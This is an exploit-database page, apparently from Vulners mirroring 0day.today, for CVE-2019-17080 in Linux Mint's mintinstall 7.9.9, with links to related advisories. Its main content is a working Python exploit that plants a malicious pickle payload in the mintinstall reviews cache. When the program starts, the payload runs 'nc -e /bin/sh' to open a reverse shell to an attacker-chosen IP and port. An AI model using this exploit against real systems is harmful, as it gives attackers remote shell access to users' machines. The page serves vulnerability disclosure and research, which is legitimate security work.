Lucene search
K

mintinstall 7.9.9 - Code Execution Exploit

🗓️ 04 Oct 2019 00:00:00Reported by AndhrimnirrType 
zdt
 zdt
🔗 0day.today👁 58 Views

object injection exploit in mintinstall 7.9.

Related
Code
ReporterTitlePublishedViews
Family
BDU FSTEC
The vulnerability of the REVIEWS_CACHE component of the mintinstall program manager allows a hacker to execute arbitrary code.
26 Dec 201900:00
bdu_fstec
Circl
CVE-2019-17080
21 Sep 202104:41
circl
CVE
CVE-2019-17080
2 Oct 201912:17
cve
Cvelist
CVE-2019-17080
2 Oct 201912:17
cvelist
Exploit DB
mintinstall 7.9.9 - Code Execution
3 Oct 201900:00
exploitdb
exploitpack
mintinstall 7.9.9 - Code Execution
3 Oct 201900:00
exploitpack
NVD
CVE-2019-17080
2 Oct 201913:15
nvd
OSV
CVE-2019-17080
2 Oct 201913:15
osv
Packet Storm
mintinstall 7.9.9 Code Execution
2 Oct 201900:00
packetstorm
Prion
Code injection
2 Oct 201913:15
prion
Rows per page
# Exploit Title: mintinstall (aka Software Manager) object injection
# Exploit Author: Andhrimnirr
# Vendor Homepage: https://www.linuxmint.com/
# Software Link: mintinstall (aka Software Manager)
# Version: 7.9.9
# Tested on: Linux Mint
# CVE : CVE-2019-17080


import os
import sys
def shellCode(payload):
    with open(f"{os.getenv('HOME')}/.cache/mintinstall/reviews.cache","w") as wb:
        wb.write(payload)
    print("[+] Start mintinstall")
if __name__=="__main__":
    shellCode(f"""cos\nsystem\n(S"nc -e /bin/sh {sys.argv[1]} {sys.argv[2]}"\ntR.""")
else:
    print("[!] exploit.py [IP] [PORT]")

#  0day.today [2019-12-04]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation